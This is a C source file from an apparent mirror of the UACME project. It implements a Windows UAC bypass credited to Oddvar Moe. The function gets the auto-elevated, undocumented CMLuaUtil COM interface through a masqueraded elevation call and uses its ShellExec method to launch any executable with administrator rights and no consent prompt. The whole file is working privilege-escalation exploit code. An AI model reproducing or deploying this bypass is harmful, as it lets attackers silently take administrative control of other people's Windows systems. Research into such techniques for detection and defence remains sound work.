mirror of https://github.com/hfiref0x/UACME.git
81 lines
1.9 KiB
C
81 lines
1.9 KiB
C
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2017
|
|
*
|
|
* TITLE: API0CRADLE.C
|
|
*
|
|
* VERSION: 2.82
|
|
*
|
|
* DATE: 02 Nov 2017
|
|
*
|
|
* UAC bypass method from Oddvar Moe aka api0cradle.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
#include "global.h"
|
|
|
|
/*
|
|
* ucmCMLuaUtilShellExecMethod
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.
|
|
* This function expects that supMasqueradeProcess was called on process initialization.
|
|
*
|
|
*/
|
|
BOOL ucmCMLuaUtilShellExecMethod(
|
|
_In_ LPWSTR lpszExecutable
|
|
)
|
|
{
|
|
HRESULT r = E_FAIL;
|
|
BOOL bCond = FALSE;
|
|
IID xIID_ICMLuaUtil;
|
|
CLSID xCLSID_ICMLuaUtil;
|
|
ICMLuaUtil *CMLuaUtil = NULL;
|
|
|
|
do {
|
|
|
|
if (lpszExecutable == NULL)
|
|
break;
|
|
|
|
if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
|
|
break;
|
|
}
|
|
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
|
|
break;
|
|
}
|
|
|
|
r = ucmMasqueradedCoGetObjectElevate(
|
|
T_CLSID_CMSTPLUA,
|
|
CLSCTX_LOCAL_SERVER,
|
|
&xIID_ICMLuaUtil,
|
|
&CMLuaUtil);
|
|
|
|
if (r != S_OK)
|
|
break;
|
|
|
|
if (CMLuaUtil == NULL) {
|
|
r = E_FAIL;
|
|
break;
|
|
}
|
|
|
|
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
|
|
lpszExecutable,
|
|
NULL,
|
|
NULL,
|
|
SEE_MASK_DEFAULT,
|
|
SW_SHOW);
|
|
|
|
} while (bCond);
|
|
|
|
if (CMLuaUtil != NULL) {
|
|
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
|
|
}
|
|
|
|
return SUCCEEDED(r);
|
|
}
|